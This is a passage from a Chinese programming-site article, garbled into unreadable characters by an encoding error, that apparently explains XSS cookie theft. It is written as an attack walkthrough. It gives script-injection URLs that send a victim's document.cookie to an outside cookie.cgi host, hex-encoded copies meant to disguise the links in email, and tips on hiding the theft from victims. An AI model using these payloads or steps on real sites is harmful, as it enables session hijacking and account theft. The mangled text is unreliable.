ÉèΪÊ×Ò³ ¼ÓÈëÊÕ²Ø

TOP

ÄÜ·ñ½âÊÍÒ»ÏÂXSS cookieµÁÇÔÊÇʲôÒâ˼£¿
2014-11-09 10:15:04 ¡¾´ó ÖРС¡¿ ä¯ÀÀ:10007´Î
Tags£ºÄÜ·ñ ½âÊÍ XSS cookie µÁÇÔ Ê²Ã´ Òâ˼

¸ù¾Ý×÷Ϊ¹¥»÷¶ÔÏóµÄWeb³ÌÐò£¬ÏÂÃæijЩ±äÁ¿ºÍ²åÈëλÖÿÉÄÜÐèÒª½øÐе÷Õû¡£Òª×¢ÒâÕâÖ»Êǹ¥»÷·½·¨µÄÒ»¸öÀý×Ó¡£ÔÚÕâ¸öÀý×ÓÖУ¬ÎÒÃǽ«ÀûÓýű¾¡°a.php¡±ÖÐµÄ ¡°viriable¡±±äÁ¿ÖеĿçÕ¾½Å±¾Â©¶´£¬Í¨¹ýÕý³£ÇëÇó½øÐй¥»÷¡£ÕâÊÇ¿çÕ¾½Å±¾¹¥»÷×î³£¼ûµÄÐÎʽ¡£
µÚÒ»²½: Ëø¶¨Ä¿±ê


µ±ÄãÕÒµ½Ä³¸öWeb³ÌÐò´æÔÚXSS©¶´Ö®ºó£¬¼ì²éÒ»ÏÂËüÊÇ·ñÉèÖÃÁËcookie¡£Èç¹ûÔÚ¸ÃÍøÕ¾µÄÈκεط½ÉèÖÃÁËcookie£¬ÄÇô¾Í¿ÉÒÔ´ÓÓû§ÄÇÀïµÁÈ¡Ëü¡£
µÚ¶þ²½: ²âÊÔ


²»Í¬µÄ¹¥»÷·½Ê½½«²úÉú²»Í¬µÄXSS©¶´£¬ËùÒÔÓ¦Êʵ±½øÐвâÊÔÒÔʹµÃÊä³ö½á¹û¿´ÆðÀ´ÏñÊÇÕý³£µÄ¡£Ä³Ð©¶ñÒâ½Å±¾²åÈëÖ®ºó»áÆÆ»µÊä³öµÄÒ³Ãæ¡££¨ÎªÆÛÆ­Óû§£¬Êä³ö½á¹û·Ç³£ÖØÒª£¬Òò´Ë¹¥»÷ÕßÓбØÒªµ÷Õû¹¥»÷´úÂëʹÊä³ö¿´ÆðÀ´Õý³£¡££©


ÏÂÒ»²½ÄãÐèÒªÔÚÁ´½ÓÖÁ°üº¬XSS©¶´µÄÒ³ÃæµÄURLÖвåÈë java script£¨»òÆäËû¿Í»§¶Ë½Å±¾£©¡£ÏÂÃæÁгöÁËһЩ¾­³£ÓÃÓÚ²âÊÔXSS©¶´µÄÁ´½Ó¡£µ±Óû§µã»÷ÕâЩÁ´½Óʱ£¬Óû§µÄcookie½±±»·¢Ë͵½ www.cgisecurity.com/cgi-bin/cookie.cgi ²¢±»ÏÔʾ¡£Èç¹ûÄã¿´µ½ÏÔʾ½á¹ûÖаüº¬ÁËcookieÐÅÏ¢£¬ËµÃ÷¿ÉÄÜ¿ÉÒÔ½Ù³Ö¸ÃÓû§µÄÕË»§¡£


µÁÈ¡CookieµÄjava scriptʾÀý¡£Ê¹Ó÷½·¨ÈçÏ¡£


ASCIIÓ÷¨


http://host/a.php variable=¡±><script>document.location=¡¯http://www.cgisecurity.com/cgi-bin/cookie.cgi ¡®%20+document.cookie


Ê®Áù½øÖÆÓ÷¨


http://host/a.php variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f


%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e


×¢Òâ: ÿÖÖÓ÷¨¶¼ÏÈдΪASCII£¬ÔÙд³ÉÊ®Áù½øÖÆÒԱ㸴ÖÆÕ³Ìù¡£


1. ¡°><script>document.location=¡¯http://www.cgisecurity.com/cgi-bin/cookie.cgi ¡¯ +document.cookie


HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e


2. <script>document.location=¡¯http://www.cgisecurity.com/cgi-bin/cookie.cgi ¡¯ +document.cookie


HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e


3. ><script>document.location=¡¯http://www.cgisecurity.com/cgi-bin/cookie.cgi ¡¯ +document.cookie


HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e


µÚÈý²½: Ö´ÐÐXSS


½«×öºÃµÄURLͨ¹ýµç×ÓÓʼþ»òÆäËû·½Ê½·¢ËͳöÈ¥¡£×¢ÒâÈç¹ûÄãÖ±½Ó½«URL·¢Ë͸øÆäËûÈË£¨Í¨¹ýµç×ÓÓʼþ¡¢¼´Ê±Í¨Ñ¶Èí¼þ»òÆäËû·½Ê½£©£¬ÄãÓ¦µ±½«Æä½øÐÐÊ®Áù½øÖƱàÂ룬ÒòΪÕâЩURLÒ»ÑÛ±ã¿É¿´³ö°üº¬¶ñÒâ´úÂ룬µ«¾­¹ýÊ®Áù½øÖƱàÂëÖ®ºó¾Í¿ÉÒÔÆÛÆ­´ó²¿·ÖÈË¡£
µÚËIJ½: ´¦ÀíÊÕ¼¯µ½µÄÐÅÏ¢


Ò»µ©Óû§µã»÷ÁËÄãµÄURL£¬ÏàÓ¦Êý¾Ý¾Í»á±»·¢Ë͵½ÄãµÄCGI½Å±¾ÖС£ÕâÑùÄã¾Í»ñµÃÁË cookieÐÅÏ¢£¬È»ºóÄã¿ÉÒÔÀûÓÃWebsleuthÖ®ÀàµÄ¹¤¾ßÀ´¼ì²éÊÇ·ñÄܵÁÈ¡ÄǸöÕË»§¡£


ÔÚÉÏÃæµÄÀý×ÓÖУ¬ÎÒÃǽö½ö½«Óû§´øµ½ÁË cookie.cgiÒ³ÃæÉÏ¡£Èç¹ûÄãÓÐʱ¼ä£¬Äã¿ÉÒÔÔÚCGIÖн«Óû§Öض¨Ïòµ½Ô­À´µÄÒ³ÃæÉÏ£¬¼´¿ÉÔÚÓû§²»Öª²»¾õÖ®ÖеÁÈ¡ÐÅÏ¢¡£


ijЩµç×ÓÓʼþ³ÌÐòÔÚ´ò¿ª¸½¼þʱ»á×Ô¶¯Ö´Ðи½¼þÖеÄjava script´úÂë¡£¼´Ê¹ÏñHotmailÕâÑùµÄ´óÐÍÍøÕ¾Ò²ÊÇÈç´Ë£¬²»¹ýËü¶Ô¸½¼þÄÚÈÝ×÷ÁËÐí¶à¹ýÂËÒÔ±ÜÃâcookie±»µÁ¡£


¡¾´ó ÖРС¡¿¡¾´òÓ¡¡¿ ¡¾·±Ìå¡¿¡¾Í¶¸å¡¿¡¾Êղء¿ ¡¾ÍƼö¡¿¡¾¾Ù±¨¡¿¡¾ÆÀÂÛ¡¿ ¡¾¹Ø±Õ¡¿ ¡¾·µ»Ø¶¥²¿¡¿
ÉÏһƪ£ºjavaÈçºÎ»ñµÃJVM¿ÉÄܵÄ×ÜÄڴ棬×î.. ÏÂһƪ£º2014ÌÚѶǰ¶Ë¿ª·¢¹¤³ÌʦÃæÊÔ²¿·Ö..

×îÐÂÎÄÕÂ

ÈÈÃÅÎÄÕÂ

Hot ÎÄÕÂ

Python

C ÓïÑÔ

C++»ù´¡

´óÊý¾Ý»ù´¡

linux±à³Ì»ù´¡

C/C++ÃæÊÔÌâÄ¿